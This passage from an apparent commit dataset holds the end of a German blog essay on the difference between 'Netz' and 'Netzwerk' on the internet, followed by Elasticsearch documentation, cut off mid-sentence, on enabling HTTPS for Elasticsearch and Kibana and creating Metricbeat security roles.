sogar alles nebeneinander. So erlaubt das internet das auftreten massenmedialer strukturen, solange diese f\u00fcr sich funktionieren. \n\n\n____\nRedundanz ist das Prinzip des Internets, das untergr\u00fcndig aufrechterhalten wird. Unternehmen sind im Besitz von Gebieten aus Datenleitungen, durch die zu leiten eine vermarktete Dienstleistung ist. Diese archaische Infrakstruktur der Gebietsaufteilung ist Teil kaum einer Beschreibung des Internets, und zu Recht, _denn seine Operationen sind im Gegenteil durch ihre Ortlosigkeit gekennzeichnet_. Das Speichern von Daten, von Text wird heute massenhaft von gro\u00dfen Unternehmen \u00fcbernommen (der eigene Server im Wohnzimmer darf als Ausnahme gelten). Gibt es einen guten Grund, Kommunikation, Textverbreitung- und speicherung unter Bedingung von Plattformen zu beschreiben? Auch diese Dienste bieten die M\u00f6glichkeit, durch Kopie Redundanz herzustellen. Wenn wir sie richtig verwenden, k\u00f6nnen wir sie vergessen.\n\n_Es geht nicht um Plattformneutralit\u00e4t, sondern Plattformindifferenz._\n____\n\n\nAls netzwerk ist das internet unscharf; darin liegt das potential: in der fluidit\u00e4t und komplexit\u00e4t der vernetzung; diese erm\u00f6glicht sich durch die stabilit\u00e4t ihrer grundlegenden strukturkonstante: der adresse; denn wie komplex und fluide das internet netzwerkt, immer sind adressen beteiligt; und nur unter r\u00fcckgriff auf adressen l\u00e4\u00dft sich vernetzung beobachten (wie sonst?); das internet selbst ersch\u00f6pft sich aber nicht in den adressen, sondern schlie\u00dft die proze\u00dfseite ein; und gerade diese ist die noch gr\u00f6\u00dftenteils unerkl\u00e4rte neuheit:\n\n\n\n\n\n---\n\n[[footnote-1, 1]] [1] Der aufruf zur blogparade _Netz und Netzwerk_:\n\n++++\n<blockquote class=\"twitter-tweet\" data-partner=\"tweetdeck\"><p lang=\"de\" dir=\"ltr\">Aufruf zur Blogparade: "Was ist der Unterschied zwischen Netz und Netzwerk?"<br><br>[bis 30.04 hashtag <a href=\"https:\/\/twitter.com\/hashtag\/blgntzwrk?src=hash\">#blgntzwrk<\/a>]<br><br>Bitte RT!<\/p>— Klaus Kusanowsky (@kusanowsky) <a href=\"https:\/\/twitter.com\/kusanowsky\/status\/854803923751890944\">April 19, 2017<\/a><\/blockquote>\n<script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n++++\n\nSiehe f\u00fcr weitere beitr\u00e4ge auch http:\/\/professio.ifwo.eu[Netz und Netzwerk] von http:\/\/twitter.com\/adloquii[@adloquii] und die https:\/\/colloquium.ifwo.eu\/2017\/04\/30\/netz-und-netzwerk\/[gleichnamige folge] seines https:\/\/colloquium.ifwo.eu[colloquium-podcasts] mit http:\/\/twitter.com\/christopheus[@christopheus].\n\n[[footnote-2, 2]] [2] Vernetzung ist hier also im doppelsinne von ding und proze\u00df der deutschen substantivendung -ung gemeint; ein gutes beispiel ist die \u00bbsteuerung\u00ab, welche die steuermechnaik oder den vorgang des steuerns bezeichnen kann.","old_contents":"# Netz und Netzwerk\n:hp-tags: netz, netzwerk,\n:published_at: 2017-05-04\n\nVERSP\u00c4TETER BEITRAG ZUR BLOGPARADE [<<footnote-1>>]\n\nSprach\u00fcblichkeiten entsprechen begriffsw\u00fcnschen selten; folgender wortgebrauch mag un\u00fcblich sein.\n\n\n### Netz\/Netzwerkstruktur\n\nDas netzwerk ist vernetzung im doppelsinn, unterscheidbar nach struktur- und proze\u00dfseite: die strukturseite bezeichnet die vernetzungsbedingungen, hier: die netzwerkstruktur; die proze\u00dfseite bezeichnet die sich durch vernetzung exekutierende netzstruktur, hier: netz.\n\nDie beobachtung des netzwerks leidet an einem unsch\u00e4rfeproblem, da jede struktur nur in seiner prozessierung beobachtbar ist und jeder proze\u00df nur als exekution einer struktur als proze\u00df erkennbar wird. Eine seite ist also nur durch die pr\u00e4supponierung der jeweils anderen beobachtbar. Wer das netz beobachtet (hei\u00dft: schaut, was das netz \u00bbmacht\u00ab, wie es sich \u00bbverh\u00e4lt\u00ab, also: wie es prozessiert) pr\u00e4supponiert eine sich darin exekutierende netzwerkstruktur, an welcher ver\u00e4nderungen des netzes me\u00dfbar sind; beschaut wird der wandel von strukturmomenten, also der wechsel von strukturvariablen (stukturindifferente ver\u00e4nderungen des netzes) wie die entwicklung der strukturkonstanten, an welchen das netz als netz einortbar ist; erst so werden fehler- und mangelerscheinungen, destruktion, konstruktion, etc. sichtbar. (Die struktur gibt also \u2013 nicht nur, aber auch \u2013 auskunft \u00fcber die funktion.) Auf der anderen seite kann die netzstruktur nur an der aktualisierung der struktur in der strukturexekution durch den proze\u00df, eine netzwerkstruktur als nur an den sich realisierenden netzen erkannt werden. Daf\u00fcr mu\u00df feststehen, was netz innerhalb des netzwerks ist, an dem die netzwerkstruktur erarbeitet werden kann.\n\nIn seiner gesamtheit ist das netzwerk nicht tiefenscharf beobachtbar.\n\n\n\n\n### Das Internet als Netz\n\nDas internet ist nun als netz oder als netzwerk beschreibbar. Ich pl\u00e4diere f\u00fcr letzteres, nachdem ich ersteres problematisiert habe:\n\nDas internet hat keine eigene struktur; eine netzwerkstruktur prozessiert im internet auf eine bestimmte (aber strukturvariable) weise: digital. Man f\u00fchrt gespr\u00e4che \u00fcber chatrooms oder videotelephonie, unterh\u00e4lt freundschaften \u00fcber internetportale oder liest blogs anstelle von zeitschriften; es ist netz innerhalb eines netzwerks: es ist (bspw.) massenmedium neben massenmedien, unter ver\u00e4nderten physikalsichen (aber eben nur physikalischen) bedingungen. Aus dieser perspektive sind die vernetzungstechniken des internets primitive kompensation: vernetzung unter erschwerten bedingungen, das internet aus anla\u00df vernetzung (und das meint hier vor allem: die bedingungen f\u00fcr kommunikation) trotz einschr\u00e4nkungen fortzuf\u00fchren. [Vgl. Kompensation und poetisches lesen] Dann bleibt fraglich, weshalb digitalit\u00e4t auch bei ausbleiben der einschr\u00e4nkungen weiter genutzt wird: warum chatten, wenn man sich doch treffen k\u00f6nnte? warum \u2026 \n\nMan vermutet verblendung und f\u00fcrchtet verfall. (\u00bbdigitale verhexung\u00ab sozusagen: \u00bbder teufel hat nicht viel zeit\u00ab [BL], so hat er flux das internet erfunden! \u2026) Diese\n\n\n\n### Das Internet als Netzwerk\n\n\nDas internet als netzwerk ist besondert durch die minimalit\u00e4t der netzwerkstruktur, also der bedingungen unter denen vernetzung stattfinden; die minimalbedingung des internetvernetzung ist (neben der digitalit\u00e4t): eine verbindung ben\u00f6tigt mindestens zwei adressen, die verbunden werden; oder: eine adresse ben\u00f6tigt mindestens eine gegenadresse, mit der sie verbunden wird. Das netzwerk internet h\u00e4lt eine regel am leben: vernetze! Hierdurch ist die proze\u00dfseite unbestimmt; dem proze\u00df ist es m\u00f6glich selbst substrukteren auszubilden, die wieder prozessualisiert werden, unter der einzigen bedingung, da\u00df die prozessualisierung der substruktur die netzwerkstruktur erf\u00fcllt: man denke an plattformen, die eigene .\n\nInsofern die netzwerkbedingungen des internets f\u00fcr jedes netzwerk grunds\u00e4tzlich sind, k\u00f6nnen auch andere netzwerkstrukturen sich im netzwerk internet prozessieren: z.b. massenmedien; auch diese arbeiten mit der verkn\u00fcpfung von adressen, nur sind massenmediale netzwerkstrukturen komplizierter (und starrer): so werden bestimmte adressen als zentraladressen privilegiert und nicht-zentrale adressen eingeschr\u00e4nkt, wodurch nicht-zentrale adressen in concreta ignoriert und nur noch als abstrakte adressen behandelt werden: der leser, der h\u00f6rer, der zuschauer vs. die ARD, die ZEIT, die Journalistin, etc. Ist das verh\u00e4ltnis _nicht-zentrale adresse -> zentrale-adresse_ qualitativ, ist das umgedrehte verh\u00e4ltnis _zentrale adresse -> nicht-zentrale adresse_ vor allem quantitativ: wer schaut, z\u00e4hlt nicht, nur das gen\u00fcgend m\u00fcssen schauen.\n\nDies ist auch im internet prozessierbar, weil trotz der rigorosen adressenhierarchie und einseitigkeit problemlos digitalisiert werden kann und zugleich auch die netzwerkstruktur des internets prozessiert. Diese ertragbarkeit ist allerdings einseitig, denn das internet behandelt adressen wie adressen, und mehr als eine solche steht auch einer zeitung nicht zu verf\u00fcgung; gegen die \u00bbprobleme\u00ab des internets werden von dieser seite dann auch vor allem \u00e4u\u00dfere regulierung vorgeschlagen: (massenmedialer) strukturerhalt durch aufkl\u00e4rung von menschen oder der integration bekannter selektionsmechanismen: ausschlu\u00df, hierarchisierung von aufmerksamkeit\u2026 F\u00fcr das internet gilt aber ein bekanntes faszinationsprinzip: stellste \u2019nen sockel mit rotem knopp in die l\u00fcneburgerheide, so wird scho irgendwann wer vorbeikommen, der den dr\u00fcckt; steht der gleiche sockel auf dem Alexanderplatz, verk\u00fcrzt sich die wartezeit; und stellste 100 solcher sockel auf den Alex, wirste vor\u2019m ersten dr\u00fccker mit\u2019m aufstelln nich\u2019 fertig\u2026\n\n\n\n\n\n\n\n\n\nhat sich ver\u00e4ndert, sondern \u00fcberhaupt das verh\u00e4ltnis: produktion\u2013publikation\u2013rezeption; was eben vom wechsel von handschriftliche auf buchdruckerische publikation sich nicht \u00e4nderte. \n\n\nAuch massenmediale verkn\u00fcpfung arbeitet mit adressen, allerdings k\u00f6nnen diese durch sehr starre (weil komplizierte) verkn\u00fcpfungstechniken und privilegierung einzelner adressen (one-to-many, many-to-one) die adressen in conreta ignorieren und und mit abstrakten adressen arbeiten: das ARD, aber \u203adie zuschauer des ARD\u2039 \u2013 die ZEIT, aber \u203adie leser der ZEIT\u2039 \u2026 Die abstrakten adressen wirken dann nur quantitativ: gen\u00fcgend leser, gen\u00fcgend zuschauer brauchts, wer da geht und wer da kommt, bleibt egal. Diese abstrakten adressen kann das internet nicht bilden, weil es eben nicht ein netz im netzwerk ist: eine abstrakte adresse ist nicht anw\u00e4hlbar; nur konkrete adressen sind zugelassen und jede adresse ist (gleichrangig) adresse; die ZEIT kann einen retweet nicht erzwingen, aber die 13-j\u00e4hrige sch\u00fclerin aus einem s\u00e4chsischen dorf einen Da\u00df das internet massenmedial mi\u00dfverstanden wird, liegt wohl h\u00e4ufig daran, da\u00df es schr\u00e4g zu den massenmedien steht: die versuchen \u00fcber das netzwerk internet das netzwerk massenmedium zu produzieren; das funktioniert nur eingeschr\u00e4nkt, so alle nicht-privilegierten adressen mitmachen; das internet bietet keinen sonderadressen, die publikationsmittel sind (ersteinmal) gleich verteilt und da nicht-privilegierte adressen im internet \u00fcberwiegen, ist verweigerung (extrem als \u00bbtrollen\u00ab) hoch wahrscheinlich. (Und wie reagiert die massenmediale logik auf diesen konflikt?: sie fordert die \u00fcbertragung der privilegierungs- und selektionskriterien: das problem mit dem internet l\u00e4ge in der flexibilit\u00e4t der bedingungslosigkeit der adressenbildung (jeder, soviele er will, unter jedem namen, etc.) und deren vernetzung; massenmedial ist das problem des internets das internet. (Man will also ein digitales massenmedium und denkt auch zugleich dauernd, damit h\u00e4tte sie es zu tun.)\n\n\n\nDas internet ist gepr\u00e4gt durch die bindung der vernetzungsstrukturen an bestehende netzmechaniken (also die regelung der adressenvergabe und adressenvernetzung ), wie anders herum die bindung der netzprozesse \u2013 wie adressen vergeben werden ist nicht unabh\u00e4ngig von den plattformen\n \nInternet ist nicht blo\u00df eine struktur Dies liegt an der doppelten elementarabh\u00e4ngigkeit des internets: das internet ist strukturabh\u00e4ngig von adressen und proze\u00dfabh\u00e4ngig von der vernetzung von adressen. Dies erlaubt eine doppelte freiheit: Zum einen ist gleich, welche adressen vernetzt werden, solange sie vernetzt werden, zum anderen ist gleich, wie vernetzt wird, solange adressen vernetzt werden. Die vernetzung kann dezentral oder zentral, unmittelbar (adresse\u2013adresse) oder mittelbar (adresse \u00fcber adresse zu adresse, und zwar bis ins extremste steigerbar), minimal oder maximal (mindestens zwei, nach oben offen) stattfinden; oder sogar alles nebeneinander. So erlaubt das internet das auftreten massenmedialer strukturen, solange diese f\u00fcr sich funktionieren. \n\n\n____\nRedundanz ist das Prinzip des Internets, das untergr\u00fcndig aufrechterhalten wird. Unternehmen sind im Besitz von Gebieten aus Datenleitungen, durch die zu leiten eine vermarktete Dienstleistung ist. Diese archaische Infrakstruktur der Gebietsaufteilung ist Teil kaum einer Beschreibung des Internets, und zu Recht, _denn seine Operationen sind im Gegenteil durch ihre Ortlosigkeit gekennzeichnet_. Das Speichern von Daten, von Text wird heute massenhaft von gro\u00dfen Unternehmen \u00fcbernommen (der eigene Server im Wohnzimmer darf als Ausnahme gelten). Gibt es einen guten Grund, Kommunikation, Textverbreitung- und speicherung unter Bedingung von Plattformen zu beschreiben? Auch diese Dienste bieten die M\u00f6glichkeit, durch Kopie Redundanz herzustellen. Wenn wir sie richtig verwenden, k\u00f6nnen wir sie vergessen.\n\n_Es geht nicht um Plattformneutralit\u00e4t, sondern Plattformindifferenz._\n____\n\n\nAls netzwerk ist das internet unscharf; darin liegt das potential: in der fluidit\u00e4t und komplexit\u00e4t der vernetzung; diese erm\u00f6glicht sich durch die stabilit\u00e4t ihrer grundlegenden strukturkonstante: der adresse; denn wie komplex und fluide das internet netzwerkt, immer sind adressen beteiligt; und nur unter r\u00fcckgriff auf adressen l\u00e4\u00dft sich vernetzung beobachten (wie sonst?); das internet selbst ersch\u00f6pft sich aber nicht in den adressen, sondern schlie\u00dft die proze\u00dfseite ein; und gerade diese ist die noch gr\u00f6\u00dftenteils unerkl\u00e4rte neuheit:\n\n\n\n\n\n---\n\n[[footnote-1, 1]] [1] Der aufruf zur blogparade _Netz und Netzwerk_:\n\n++++\n<blockquote class=\"twitter-tweet\" data-partner=\"tweetdeck\"><p lang=\"de\" dir=\"ltr\">Aufruf zur Blogparade: "Was ist der Unterschied zwischen Netz und Netzwerk?"<br><br>[bis 30.04 hashtag <a href=\"https:\/\/twitter.com\/hashtag\/blgntzwrk?src=hash\">#blgntzwrk<\/a>]<br><br>Bitte RT!<\/p>— Klaus Kusanowsky (@kusanowsky) <a href=\"https:\/\/twitter.com\/kusanowsky\/status\/854803923751890944\">April 19, 2017<\/a><\/blockquote>\n<script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n++++\n\nSiehe f\u00fcr weitere beitr\u00e4ge auch http:\/\/professio.ifwo.eu[Netz und Netzwerk] von http:\/\/twitter.com\/adloquii[@adloquii] und die https:\/\/colloquium.ifwo.eu\/2017\/04\/30\/netz-und-netzwerk\/[gleichnamige folge] seines https:\/\/colloquium.ifwo.eu[colloquium-podcasts] mit http:\/\/twitter.com\/christopheus[@christopheus].\n\n[[footnote-2, 2]] [2] Vernetzung ist hier also im doppelsinne von ding und proze\u00df der deutschen substantivendung -ung gemeint; ein gutes beispiel ist die \u00bbsteuerung\u00ab, welche die steuermechnaik oder den vorgang des steuerns bezeichnen kann.\n\n[footnote-2, 2] [2] Wer auf ontologische referenz als begriffsrechtfertigung verzichtet und stattdessen auf konstruktive (nicht konstruktivistische!) methoden setzt, ben\u00f6tigt zur einf\u00fchrung von unterscheidungen und begriffen nur deren konstruierbarkeit; eine unterscheidung ist m\u00f6glich, so die unterscheidung gemacht werden kann; ihre konstruierbarkeit unterstellt dann ihre (intertemporale und interpersonale) [Nichteinmal das ist zwingend, da eine unterscheidung auch konstruierbar ist, wenn sie nur f\u00fcr ein bewu\u00dftsein in einem moment unvermittelbar konstruiert wird. Nur ist die unterscheidung dann personen- und kontextvariant: gebunden an das bewu\u00dftsein in dem moment. Ich sehe von diesen f\u00e4llen ab und spreche nur \u00fcber kommunikative unterscheidungen.] rekonstruktion. [Im methodischen konstruktivismus wird dies unter das (dort normative) prinzip der lehr-lernbarkeit subsumiert, vgl. dazu\u2026 ]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"785ce7edb856a0a79b25aa14a50cd7182930ea5f","subject":"[DOCS] Add missing SSL settings for Metricbeat (#72987)","message":"[DOCS] Add missing SSL settings for Metricbeat (#72987)\n\n","repos":"robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"x-pack\/docs\/en\/security\/securing-communications\/security-basic-setup-https.asciidoc","new_file":"x-pack\/docs\/en\/security\/securing-communications\/security-basic-setup-https.asciidoc","new_contents":"[[security-basic-setup-https]]\n=== Set up basic security for the Elastic Stack plus secured HTTPS traffic\n++++\n<titleabbrev>Set up basic security plus HTTPS<\/titleabbrev>\n++++\n\nIn a production environment, some {es} features such as tokens and\nAPI keys will be disabled unless you enable TLS on the HTTP layer. This\nadditional layer of security ensures that all communications to and from your\ncluster are secured.\n\nWhen you run the `elasticsearch-certutil` tool in `http` mode, the tool asks\nseveral questions about how you want to generate certificates. While there are\nnumerous options, the following choices result in certificates that should\nwork for most environments.\n\n[[signing-certificates]]\n.Signing certificates\n****\nThe first question that the `elasticsearch-certutil` tool prompts you with is\nwhether you want to generate a Certificate Signing Request (CSR). Answer\n`n` if you want to sign your own certificates, or `y` if you want to sign\ncertificates with a central CA.\n\n[discrete]\n===== Sign your own certificates\n\nIf you want to use the CA that you created when\n<<generate-certificates,Generating the certificate authority>> answer `n` when\nasked if you want to generate a CSR. You then specify the location of your CA,\nwhich the tool uses to sign and generate a `.p12` certificate. The steps in\nthis procedure follow this workflow.\n\n[discrete]\n===== Sign certificates with a central CA\n\nIf you work in an environment with a central security team, they can likely\ngenerate a certificate for you. Infrastructure within your organization\nmight already be configured to trust an existing CA, so it may be easier\nfor clients to connect to {es} if you use a CSR and send that\nrequest to the team that controls your CA. To use a central CA, answer `y` to\nthe first question.\n****\n\n[[basic-setup-https-prerequisites]]\n==== Prerequisites\n\nComplete all steps in <<security-basic-setup,Set up basic security for the Elastic Stack>>.\n\n[[encrypt-http-communication]]\n==== Encrypt HTTP client communications for {es}\n\n. Stop {es} and {kib} if they are running.\n\n. From the directory where you installed {es}, run the {es}\n HTTP certificate tool to generate a Certificate Signing Request (CSR).\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-certutil http\n----\n+\nThis command generates a `.zip` file that contains certificates and keys\nto use with {es} and {kib}. Each folder contains a `README.txt`\nexplaining how to use these files.\n\n a. When asked if you want to generate a CSR, enter `n`.\n\n b. When asked if you want to use an existing CA, enter `y`.\n\n c. Enter the path to your CA. This is the absolute path to\n the `elastic-stack-ca.p12` file that you generated for your cluster.\n\n d. Enter the password for your CA.\n\n e. Enter an expiration value for your certificate. You can enter the\n validity period in years, months, or days. For example, enter `90D` for 90\n days.\n\n f. When asked if you want to generate one certificate per node, enter `y`.\n+\nEach certificate will have its own private key, and will be issued for a\nspecific hostname or IP address.\n\n g. When prompted, enter the name of the first node in your cluster. Use the same node name that you used when <<generate-certificates,generating node certificates>>.\n\n h. Enter all hostnames used to connect to your first node. These hostnames\n will be added as DNS names in the Subject Alternative Name (SAN) field in your certificate.\n+\nList every hostname and variant used to connect to your cluster over HTTPS.\n\n i. Enter the IP addresses that clients can use to connect to your node.\n\n j. Repeat these steps for each additional node in your cluster.\n\n. After generating a certificate for each of your nodes, enter a password for\n your private key when prompted.\n\n. Unzip the generated `elasticsearch-ssl-http.zip` file. This compressed file\n contains one directory for both {es} and {kib}.\n+\n--\n[source,txt]\n----\n\/elasticsearch\n|_ README.txt\n|_ http.p12\n|_ sample-elasticsearch.yml\n----\n\n[source,txt]\n----\n\/kibana\n|_ README.txt\n|_ elasticsearch-ca.pem\n|_ sample-kibana.yml\n----\n--\n\n. Copy the relevant `http.p12` certificate to the `ES_PATH_CONF` directory on each node.\n\n. On each node, edit the `elasticsearch.yml` file to enable HTTPS security and\n specify the location of the `http.p12` security certificate.\n+\n[source,yaml]\n----\nxpack.security.http.ssl.enabled: true\nxpack.security.http.ssl.keystore.path: http.p12\n----\n\n. Add the password for your private key to the secure settings in {es}.\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-keystore add xpack.security.http.ssl.keystore.secure_password\n----\n\n. Start {es}.\n\n**Next**: <<encrypt-kibana-http,Encrypt HTTP client communications for {kib}>>\n\n[[encrypt-kibana-http]]\n==== Encrypt HTTP client communications for {kib}\n\nBrowsers send traffic to {kib} and {kib} sends traffic to {es}.\nThese communication channels are configured separately to use TLS. You encrypt\ntraffic between your browser and {kib}, and then encrypt traffic between\n{kib} and {es}.\n\n[[encrypt-kibana-elasticsearch]]\n===== Encrypt traffic between {kib} and {es}\n\nWhen you ran the `elasticsearch-certutil` tool with the `http` option, it\ncreated a `\/kibana` directory containing an `elasticsearch-ca.pem` file. You\nuse this file to configure {kib} to trust the {es} CA for the HTTP\nlayer.\n\n1. Copy the `elasticsearch-ca.pem` file to the {kib} configuration directory,\nas defined by the `KBN_PATH_CONF` path.\n\n2. Open `kibana.yml` and add the following line to specify the location of the\nsecurity certificate for the HTTP layer.\n+\n[source,yaml]\n----\nelasticsearch.ssl.certificateAuthorities: KBN_PATH_CONF\/elasticsearch-ca.pem\n----\n\n3. Add the following line to specify the HTTPS URL for your {es}\ncluster.\n+\n[source,yaml]\n----\nelasticsearch.hosts: https:\/\/<your_elasticsearch_host>.com:9200\n----\n\n4. Restart {kib}.\n\n.Connect to a secure monitoring cluster\n****\nIf the Elastic monitoring features are enabled and you configured a separate\n{es} monitoring cluster, you can also configure {kib} to connect to\nthe monitoring cluster via HTTPS. The steps are the same, but each setting is\nprefixed by `monitoring`. For example, `monitoring.ui.elasticsearch.hosts` and\n`monitoring.ui.elasticsearch.ssl.truststore.path`.\n\nNOTE: You must create a separate `elasticsearch-ca.pem` security file for the\nmonitoring cluster.\n****\n\n**Next**: <<encrypt-kibana-browser,Encrypt traffic between your browser and {kib}>>\n\n[[encrypt-kibana-browser]]\n===== Encrypt traffic between your browser and {kib}\n\nYou create a server certificate and private key for {kib}. {kib} uses this\nserver certificate and corresponding private key when receiving connections\nfrom web browsers.\n\nWhen you obtain a server certificate, you must set its subject alternative\nname (SAN) correctly to ensure that browsers will trust it. You can set one or\nmore SANs to the {kib} server\u2019s fully-qualified domain name (FQDN), hostname,\nor IP address. When choosing the SAN, pick whichever attribute you'll use to\nconnect to {kib} in your browser, which is likely the FQDN.\n\nThe following instructions create a Certificate Signing Request (CSR) for {kib}.\nA CSR contains information that a CA uses to generate and sign a security\ncertificate. The certificate can be trusted (signed by a public, trusted CA)\nor untrusted (signed by an internal CA). A self-signed or internally-signed\ncertificate is acceptable for development environments and building a proof of\nconcept, but should not be used in a production environment.\n\nWARNING: Before going to production, use a trusted CA such as https:\/\/letsencrypt.org\/[Let's\nEncrypt] or your organization's internal CA to sign the certificate. Using a\nsigned certificate establishes browser trust for connections to {kib} for\ninternal access or on the public internet.\n\n. Generate a server certificate and private key for {kib}.\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-certutil csr -name kibana-server -dns example.com,www.example.com\n----\n+\nThe CSR has a common name (CN) of `kibana-server`, a SAN of `example.com`,\nand another SAN of `www.example.com`.\n+\nThis command generates a `csr-bundle.zip` file by default with the following\ncontents:\n+\n[source,txt]\n----\n\/kibana-server\n|_ kibana-server.csr\n|_ kibana-server.key\n----\n\n. Unzip the `csr-bundle.zip` file to obtain the `kibana-server.csr` unsigned\nsecurity certificate and the `kibana-server.key` unencrypted private key.\n\n. Send the `kibana-server.csr` certificate signing request to your internal\nCA or trusted CA for signing to obtain a signed certificate. The signed file\ncan be in different formats, such as a `.crt` file like `kibana-server.crt`.\n\n. Open `kibana.yml` and add the following lines to configure {kib} to access\nthe server certificate and unencrypted private key.\n+\n[source,yaml]\n----\nserver.ssl.certificate: KBN_PATH_CONF\/kibana-server.crt\nserver.ssl.key: KBN_PATH_CONF\/kibana-server.key\n----\n+\nNOTE: `KBN_PATH_CONF` contains the path for the {kib} configuration files. If\nyou installed {kib} using archive distributions (`zip` or `tar.gz`), the\npath defaults to `KBN_HOME\/config`. If you used package distributions\n(Debian or RPM), the path defaults to `\/etc\/kibana`.\n\n. Add the following line to `kibana.yml` to enable TLS for inbound\nconnections.\n+\n[source,yaml]\n----\nserver.ssl.enabled: true\n----\n\n. Start {kib}.\n\nNOTE: After making these changes, you must always access {kib} via HTTPS. For\nexample, `https:\/\/<your_kibana_host>.com`.\n\n**Next**: <<configure-beats-security,Configure {beats} security>>\n\n[[configure-beats-security]]\n==== Configure {beats} security\n\nThe {beats} are open source data shippers that you install as agents on your\nservers to send operational data to {es}. Each Beat is a separately\ninstallable product. The following steps cover configuring security for\n{metricbeat}. Follow these steps for each https:\/\/www.elastic.co\/guide\/en\/elastic-stack-get-started\/7.9\/get-started-elastic-stack.html#install-beats[additonal Beat] you want to configure security for.\n\n===== Prerequisites\n\nhttps:\/\/www.elastic.co\/guide\/en\/beats\/metricbeat\/7.9\/metricbeat-installation-configuration.html[Install {metricbeat}] using your preferred method.\n\nNOTE: You cannot connect to the Elastic Stack or set up assets for {metricbeat}\nbefore completing the following steps.\n\n===== Create roles for {metricbeat}\nTypically, you need to create the following separate roles:\n\n- **setup** role for setting up index templates and other dependencies\n- **monitoring** role for sending monitoring information\n- **writer** role for publishing events collected by Metricbeat\n- **reader** role for Kibana users who need to view and create visualizations that access Metricbeat data\n\nNOTE: These instructions assume that you are using the default name for\n{metricbeat} indices. If the indicated index names are not listed, or you are\nusing a custom name, enter it manually when defining roles and modify the\nprivileges to match your index naming pattern.\n\nTo create users and roles from Stack Management in {kib}, select **Roles**\nor **Users** from the side navigation.\n\n**Next**: <<beats-setup-role,Create a setup role>>\n\n[discrete]\n[[beats-setup-role]]\n====== Create a setup role and user\n\nAdministrators who set up {metricbeat} typically need to load mappings,\ndashboards, and other objects used to index data into {es} and visualize it in\n{kib}.\n\nWARNING: Setting up {metricbeat} is an admin-level task that requires extra\nprivileges. As a best practice, grant the setup role to administrators only,\nand use a more restrictive role for event publishing.\n\n1. Create the setup role:\n\n a. Enter **metricbeat_setup** as the role name.\n\n b. Choose the **monitor** and **manage_ilm** cluster privileges.\n\n c. On the **metricbeat-\\*** indices, choose the **manage** and **write**\n privileges.\n+\nIf the **metricbeat-\\*** indices aren't listed, enter that pattern into the\nlist of indices.\n\n2. Create the setup user:\n\n a. Enter **metricbeat_setup** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_setup** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_setup` | Set up {metricbeat}.\n| `kibana_admin` | Load dependencies, such as example dashboards, if available, into {kib}\n| `ingest_admin` | Set up index templates and, if available, ingest pipelines\n| `beats_admin` | Enroll and manage configurations in {beats} central management\n|===\n\n**Next**: <<beats-monitoring-role,Create a monitoring role>>\n\n[discrete]\n[[beats-monitoring-role]]\n====== Create a monitoring role and user\n\nTo send monitoring data securely, create a monitoring user and grant it the\nnecessary privileges.\n\nYou can use the built-in `beats_system` user, if it\u2019s available in your\nenvironment. Because the built-in users are not available in Elastic Cloud,\nthese instructions create a user that is explicitly used for monitoring\n{metricbeat}.\n\n1. Create the monitoring role:\n\n a. Enter **metricbeat_monitoring** as the role name.\n\n b. Choose the **monitor** cluster privilege.\n\n c. On the **.monitoring-beats-\\*** indices, choose the **create_index** and\n **create_doc** privileges.\n\n2. Create the monitoring user:\n\n a. Enter **metricbeat_monitoring** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_monitoring** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_monitoring` | Monitor {metricbeat}.\n| `kibana_admin` | Use {kib}\n| `monitoring_user` | Use Stack Monitoring in {kib} to monitor {metricbeat}\n|===\n\n**Next**: <<beats-writer-role,Create a writer role>>\n\n[discrete]\n[[beats-writer-role]]\n====== Create a writer role and user\n\nUsers who publish events to {es} need to create and write to {metricbeat} indices. To minimize the privileges required by the writer role, use the setup role to pre-load dependencies. This section assumes that you\u2019ve\n<<beats-setup-role,created the setup role>>.\n\n1. Create the writer role:\n\n a. Enter **metricbeat_writer** as the role name.\n\n b. Choose the **monitor** and **read_ilm** cluster privileges.\n\n c. On the **metricbeat-\\*** indices, choose the **create_doc**, **create_index**, and **view_index_metadata** privileges.\n\n2. Create the writer user:\n\n a. Enter **metricbeat_writer** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_writer** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_writer` | Monitor {metricbeat}\n| `remote_monitoring_collector` | Collect monitoring metrics from {metricbeat}\n| `remote_monitoring_agent` | Send monitoring data to the monitoring cluster\n|===\n\n**Next**: <<beats-reader-role,Create a reader role>>\n\n[discrete]\n[[beats-reader-role]]\n====== Create a reader role and user\n\n{kib} users typically need to view dashboards and visualizations that contain\n{metricbeat} data. These users might also need to create and edit dashboards\nand visualizations. Create the reader role to assign proper privileges to these\nusers.\n\n1. Create the reader role:\n\n a. Enter **metricbeat_reader** as the role name.\n\n b. On the **metricbeat-\\*** indices, choose the **read** privilege.\n\n c. Under **Kibana**, click **Add Kibana privilege**.\n\n - Under **Spaces**, choose **Default**.\n\n - Choose **Read** or **All** for Discover, Visualize, Dashboard, and Metrics.\n\n2. Create the reader user:\n\n a. Enter **metricbeat_reader** as the user name.\n\n b. Enter the username, password, and other user details.\n\n c. Assign the following roles to the **metricbeat_reader** user:\n+\n[cols=\"1,1\"]\n|===\n| Role | Purpose\n\n| `metricbeat_reader` | Read {metricbeat} data.\n| `monitoring_user` | Allow users to monitor the health of {metricbeat}\nitself. Only assign this role to users who manage {metricbeat}\n| `beats_admin` | Create and manage configurations in {beats} central\nmanagement. Only assign this role to users who need to use {beats} central\nmanagement.\n|===\n\n**Next**: <<configure-metricbeat-tls,Configure {metricbeat} to use TLS>>\n\n[discrete]\n[[configure-metricbeat-tls]]\n===== Configure {metricbeat} to use TLS\n\nBefore starting 